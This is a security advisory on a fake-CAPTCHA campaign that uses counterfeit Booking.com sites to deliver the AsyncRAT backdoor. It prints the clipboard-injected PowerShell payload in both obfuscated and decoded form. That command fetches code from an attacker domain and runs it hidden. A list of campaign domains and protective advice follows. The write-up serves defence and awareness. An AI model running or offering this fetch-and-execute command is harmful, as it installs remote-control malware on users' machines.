Potential AsyncRAT Infection Risk Following Redirection to Fraudulent Booking.com Domains

Cybercriminals have launched a campaign targeting users on gaming websites and social media platforms, as well as promoted through sponsored advertisements, directing individuals to counterfeit websites masquerading as Booking.com. Research indicates that a significant portion of travelers, approximately 40%, engage in online searches to book their travels, thereby generating numerous opportunities for cyber scammers.

Initial signs of this campaign emerged in mid-May, with the redirect destination changing every two to three days.

Clicking these links leads users to a familiar tactic where fraudulent CAPTCHA websites hijack clipboard data, attempting to manipulate users into unwittingly infecting their devices.

While the warning is present, its purpose may not be immediately evident to users.

Malwarebytes’ Browser Guard users receive a more explicit warning:

The warning prompts the user with a message regarding clipboard access: “Hey, did you just copy something? Your clipboard was accessed from this website. Ensure you trust the source before using this information.”

It is essential not to dismiss these warnings; regardless of the familiarity of the website, the provided instructions should raise red flags.

The content that may have been copied to the clipboard can appear nonsensical to some, while more experienced users will recognize the inherent risks.

pOwERsheLl –N"O"p"rO" /w h -C"Om"ManD "$b"a"np = 'b"kn"g"n"et.com';$r"k"v = I"n"v"o"k"e-"R"e"stMethod -Uri $ba"n"p;I"nv"oke"-"E"xp"r"es"sion $r"k"v

The perpetrators employ techniques such as mixed casing, quote interruptions, and obfuscated variable names to conceal their true intentions. The underlying command, if executed, is as follows:

powershell -NoProfile -WindowStyle Hidden -Command "$banp = 'bkngnet.com'; $rkv = Invoke-RestMethod -Uri $banp; Invoke-Expression $rkv"

The malicious CAPTCHA form instructs the user to paste the clipboard content into the Windows Run dialog and run the command outlined above. When Browser Guard detects potentially harmful commands in the clipboard, it prefixes the copied content with a warning phrase, rendering it an invalid command and preventing infection.

If an unwary user proceeds without protection, the command launches a concealed PowerShell window to download and execute a file named ckjg.exe, which subsequently downloads and executes a file labeled Stub.exe, identified by Malwarebytes as Backdoor.AsyncRAT.

Backdoor.AsyncRAT is a remote access Trojan designed to remotely monitor and control affected devices, compromising user security and privacy.

Indicators of Compromise (IOCs)

Associated domains and subdomains with this campaign exhibit rapid rotation, with modifications occurring every few days. A selection of recently active domains includes:

• (booking.)chargesguestescenter[.]com
• (booking.)badgustrewivers[.]com
• (booking.)property-paids[.]com
• (booking.)rewiewqproperty[.]com
• (booking.)extranet-listing[.]com
• (booking.)guestsalerts[.]com
• (booking.)gustescharge[.]com
• kvhandelregis[.]com
• patheer-moreinfo[.]com
• guestalerthelp[.]com
• rewiewwselect[.]com
• hekpaharma[.]com
• bkngnet[.]com
• partnervrft[.]com

Best Practices for Protection

To safeguard against these and similar threats, consider the following protective measures:

• Avoid executing instructions provided by unfamiliar websites without thorough consideration.
• Implement a robust anti-malware solution capable of blocking malicious websites and scripts.
• Utilize a browser extension that blocks harmful domains and phishing attempts.
• Disable JavaScript in your browser when visiting untrusted websites.

Clipboard access is initiated by the JavaScript function document.execCommand(‘copy’). While disabling JavaScript can prevent clipboard hijacking, it may also interfere with the functionality of many regularly visited sites. A suggested approach is to utilize distinct browsers for varied purposes.

Protecting your digital identity is paramount in the face of rising cybersecurity threats. Employ comprehensive measures, including identity protection solutions, to maintain the security and privacy of your personal information.